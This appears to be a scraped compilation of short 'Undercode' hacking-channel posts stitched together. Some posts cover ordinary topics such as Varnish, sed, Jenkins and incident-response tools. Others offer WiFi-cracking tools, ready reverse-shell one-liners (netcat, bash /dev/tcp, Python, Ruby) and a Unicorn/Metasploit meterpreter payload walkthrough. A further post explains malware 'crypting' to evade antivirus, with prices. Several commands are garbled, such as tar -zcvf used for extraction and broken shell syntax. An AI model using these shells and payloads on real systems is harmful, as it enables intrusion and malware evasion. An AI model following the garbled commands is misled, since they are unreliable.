▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New tip Installing and Configuring Varnish: Part 1: How to Install Varnish on Debian and Ubuntu
Alexey 10/16/2020 0 Web server Hitch , Varnish Cache , caching


1. How to install Varnish on Debian and Ubuntu

1.1 How Varnish Caching Works for Apache

1.2 Correct Port Configuration for Varnish and Apache

1.3 Installing Varnish

1.4 Configuring Apache to Work with Varnish

1.5 Configuring Varnish to Work with Apache and Hitch

1.6 Checking Varnish and Apache

1.7 Configuring Hitch to Work with Varnish

1.8 Error "ERR_TOO_MANY_REDIRECTS"

1.9 How to tell if Varnish is running

1.10 How to Check Varnish Cache Speed

1.11 Renewing SSL Certificate Using Varnish and Hitch

1.12 Varnish is useless without configuration

2. How to set up Varnish, example rules

3. The Varnish Utilities

4. Varnish modules

🦑How Varnish Caching Works for Apache
To understand the essence of web server caching , you need to remember how a website works

1) There is a request from a user to show a certain page

2) Template files and source files are read from disk

3) The necessary information is retrieved from the database

4) Performs processing of information from the database

5) A page is formed that is sent to the user

6) Most of the simplest queries start the described chain of actions. Moreover, the number of operations performed can be even greater, or applications at the system level can be used to form the content of a web page.

7) And so every time - for each user request, the page is rebuilt.

🦑The essence of caching is that the page is created once and after that it is stored in the cache, which is kept in RAM. If a request comes back to show an already cached page

Benefits of using Varnish:

1) Varnish Cache boosts the speed of your content rich website.

2) Fast loading speeds help improve user experience and retain customers.

3) Your web server can efficiently handle website traffic with improved and smooth performance.

4) In the event of a server crash, your site will still work, delivering cached content.

5) You no longer need to update your existing hosting package from time to time as it can support high traffic. This, in turn, makes your site scalable.

6) A high website speed increases the likelihood that your website will hit search engines and show up in search results.

7) Varnish also reduces the number of servers required.


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑wifi hacking:

1)Start monitor mode

2)Stop monitor mode

3)Scan Networks

4)Getting Handshake

5)Create wordlist

6)Install Wireless tools

7)WPS Networks attacks

8)Scan for WPS Networks

9)Crack Handshake with rockyou.txt

10)Crack Handshake with wordlist

11)Crack Handshake without wordlist

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) sudo apt-get update && apt-get install git

2) sudo git clone https://github.com/ankit0183/Wifi-Hacking

3) cd Wifi-Hacking/

4) sudo python3 Wifi-Hacking.py


✅git 2020
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IP TRACKI NG TOOLS :

* [AutoTTP](https://github.com/jymcheong/AutoTTP) - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers.

* [Blue Team Training Toolkit (BT3)](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.

* [Caldera](https://github.com/mitre/caldera) - Automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CKâ„¢) project.

* [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - Modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.

* [Metta](https://github.com/uber-common/metta) - Information security preparedness tool to do adversarial simulation.

* [Network Flight Simulator](https://github.com/alphasoc/flightsim) - Lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

ALL IN ONE FREE GAME HACKING ULTIMATE TUTORIALS & TOOLS :

https://github.com/dsasmblr/game-hacking

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Shell uses sed command to delete specific lines :

The sed command deletes a specific line number
Delete row N

sed -i 'Nd' filename
Delete rows N~M

sed -i 'N,Md' filename # file[N,M]
Delete the line number represented by the shell variable (used with for statements)

sed -i "${var1},${var2}d" filename #
Delete the last line

sed -i '$d' filename
The sed command deletes lines containing specific characters
Delete the line containing "xxx"

sed -i '/xxx/d' filename

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE CTF :

CTF 1: SEGV Hunt - Find a critical buffer overflow bug in glibc. Language: C - Difficulty level:
https://securitylab.github.com/ctf/segv

CTF 2: U-Boot Challenge - Follow in the footsteps of our security research team and discover 13 vulnerabilities un U-Boot. Language: C - Difficulty level:
https://securitylab.github.com/ctf/uboot

CTF 3: XSS-unsafe jQuery plugins - Find variants of jQuery plugins that expose their clients to undocumented XSS (cross-site scripting) vulnerabilities. Language: JavaScript - Difficulty level:
https://securitylab.github.com/ctf/jquery

🦑start tutorials :

https://help.semmle.com/QL/ql-training/intro-to-ql.html

https://help.semmle.com/QL/learn-ql/beginner/ql-tutorials.html

https://lgtm.com/help/lgtm/console/ql-cpp-basic-example

https://blog.semmle.com/python-code-analysis-ql/

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑real wifi hacking for android no root :

https://play.google.com/store/apps/details?id=com.ngb.wpsconnect&hl=en_US

https://play.google.com/store/apps/details?id=com.tester.wpswpatester&hl=en_US

https://play.google.com/store/apps/details?id=com.halo.wifikey.wifilocating&hl=en_IN

https://www.kali.org/kali-linux-nethunter/

https://play.google.com/store/apps/details?id=wifi.kill.com&hl=en_US

https://play.google.com/store/apps/details?id=com.xti.wifiwarden&hl=en_IN

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Incident Response

* [Cyphon](https://www.cyphon.io/) - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow — aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents.

* [Demisto](https://www.demisto.com/community/) - Demisto community edition(free) offers full Incident lifecycle management, Incident Closure Reports, team assignments and collaboration, and many integrations to enhance automations (like Active Directory, PagerDuty, Jira and much more...)

* [FIR](https://github.com/certsocietegenerale/FIR/) - Fast Incident Response (FIR) is an cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike

* [RTIR](https://www.bestpractical.com/rtir/) - Request Tracker for Incident Response (RTIR) is the premier open source incident handling system targeted for computer security teams. We worked with over a dozen CERT and CSIRT teams around the world to help you handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑To save data in the cache, you need to use the description file manifest file to list the resources to be downloaded and cached

The manifest file can be divided into three parts:

1) CACHE MANIFEST-files listed under this heading will be cached after the first download

2) NETWORK-The files listed under this heading require a connection to the server and will not be cached

3) FALLBACK-The documents listed under this heading specify the fallback page when the page is inaccessible (such as a 404 page)
When online, the user agent will read the manifest every time he visits the page. If it is found to be changed, it will reload all the resources in the list


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS LASTEST VERSION FROM MICRSOFT OFFICIAL WEBSITE DIRECT :

WIN 7 X64

https://download.microsoft.com/download/E/A/8/EA804D86-C3DF-4719-9966-6A66C9306598/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_HOMEPREMIUM_x64FRE_en-us.iso

WIN 10 2020 OCTOBER X64

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x64.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=d32bb0ef976921bb6540b49df2562e0a

X32

https://software-download.microsoft.com/pr/Win10_20H2_EnglishInternational_x32.iso?t=9912e6b9-6607-4d50-920b-1365accf3367&e=1603296019&h=f0604e8764288406d5b11ab611710f62

ANYTHING ELSE YOU NEED FROM MICROSOFT.COM REQUEST @Undercode_Testing
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Jenkins project construction process under linux (centos7 as an example)


Install jdk

1. Download jdk and take jdk-8u261-linux-x64.tar.gz installation as an example

2. Create java folder

cd /usr/local mkdir java

3. Then unzip the jdk package

tar -zcvf jdk-8u261-linux-x64.tar.gz

4. Configure environment variables

vi /etc/profile

5. Join

6. Save and exit

:wq

7. Effective configuration file

source /etc/profile

8. Check the jdk version

java -version

2. Install node

1. Go to the official website to download the file that matches your own system:

English website: https://nodejs.org/en/download/

Take download node-v12.13.0-linux-x64.tar as an example

2. Unzip

cd /usr/local tar -xvf node-v12.13.0-linux-x64.tar

3. Check the node version

node -v

3. Install go

1. Download

Download link: https://golang.google.cn/dl/

Take go1.15.2.linux-amd64.tar.gz as an example

2. Unzip

cd /usr/local tar -zcvf go1.15.2.linux-amd64.tar.gz

3. Configure environment variables

vi /etc/profile

4. Join

Note: go get cannot be accessed directly in China, so you must first set up a proxy (to solve the problem that some packages of go cannot be downloaded)

1). Enable the go modules feature to open the proxy mode

export GO111MODULE=on

2). Set the GOPROXY environment variable to set the proxy address

export GOPROXY=https://goproxy.io

5. Save and exit

:wq

6. Effective configuration file

source /etc/profile

7. View the go version

go version

Install jenkins

1. Download linux jenkins, official website address https://pkg.jenkins.io/redhat/

2. Create a folder in the root directory

mkdir jenkins

3. After the download is complete, put jenkins-2.174-1.1.noarch.rpm into the jenkins directory

Enter the jenkins directory to decompress and decompress the command:

rpm -ivh jenkins-2.174-1.1.noarch.rpm

After decompression is successful, check the directory where jenkins is installed

whereis jenkins

4. Find the jdk installation path

ps -ef|grep java


5. Modify the /etc/init.d/jenkins file and configure the jdk installation path

vi /etc/init.d/jenkins

6. Start jenkins

7. Visit http://server IP:8080/ and enter the jenkins password

8. Install Jenkins custom recommended plugins

9. Create Jenkins user

10. Configure git, enter the global tool configuration, so far jenkins is installed, and then log in


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Reverse Shell Commands
The following are some useful commands to start listeners and reverse shells in Linux and Windows-based systems.

## Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e /bin/sh
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

## Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
* 10.10.10.10 is the IP address of the machine you want the victim to connect to.
* 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

## Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1

## Using Python
python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

## Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑for any debian base os


A) Install the Metasploit framework
Metasploit is a Unicorn dependency. Before installing Unicorn, we'll take a quick look at the Metasploit installation to make sure we have the latest version. For this we use the repository on GitHub.

Kali does a great job of keeping Metasploit stable in its reps, but we'll show you how to install the most recent version. First, uninstall any old versions of Metasploit that you may already have installed in Kali.

apt-get remove metasploit-framework
Then use cURL to download the Metasploit installer.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Update the permissions for the msfinstall file to make sure it will execute.

chmod 755 msfinstall
Run the installer script using the command ./msfinstall.

./msfinstall

B) Install Unicorn
Once Metasploit has been installed, you can install Unicorn by cloning the repository from GitHub using the git clone command github.com/trustedsec/unicorn.

git clone https://github.com/trustedsec/unicorn


Now change to the new Unicorn directory using the cd command.

cd unicorn/
Use ./unicorn.py —help to view the available Unicorn options and detailed descriptions of each attack.

./unicorn.py --help

Generate the payload
To create payload with Unicorn use below command.

./unicorn.py windows/meterpreter/reverse_https
Unicorn will use the reverse_https Metasploit module to connect to the hacker's IP using the specified port.

[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode

During payload generation, Unicorn will create two new files. The first will be the powershell_attack.txt file, the contents of which can be viewed with the cat powershell_attack.txt command. This command will display the PowerShell code that will run on the target Windows 10 machine and create a connection to meterpreter.

cat powershell_attack.txt


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crypt / Why? / Types / Issue price :

1) Crypt, crypt - the process of hiding your malicious code from antiviruses (hereinafter referred to as AB).

2) This is the process of modifying the code of your file (exe / dll) in such a way that the file itself remains operational and all antiviruses will consider that the file is harmless to the system.

3) This is accomplished in a variety of ways. The simplest ones are adding garbage sections or false calls and jumps to the file code. This simplest method has long lost its relevance due to the development of antiviruses and logistic methods of file analysis (heuristic analysis).

4) Now more complex methods are used, which include a huge complex of file file modifications. And the more sophisticated the methods, the longer your file will remain "clean" for AB.

🦑There are two types of such crypts:

1) Manual - this is when your file is modified manually, individually for the task. It is believed that this method gives a better quality result and the file stays "clean" longer.

2) With the help of a cryptor, this is an automatic method in which a program is written in advance, which produces a number of modifications standard for each file. This method is considered less reliable because the procedures performed on the file are the same for all files. This, in turn, means that if one of the files is caught by the AV, then all the others will soon begin to be detected (identified by AV as malicious).

3) With each such modification (process), the file size is increased by a certain number of kilobytes. This size is different for each service / cryptor and can vary from 5kb to 300kb. Less is better. The extra dimension is called STAB. The price ranges from $ 5 - $ 50. Automatic (using a crypter costs $ 5-15), manual costs $ 25-50.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁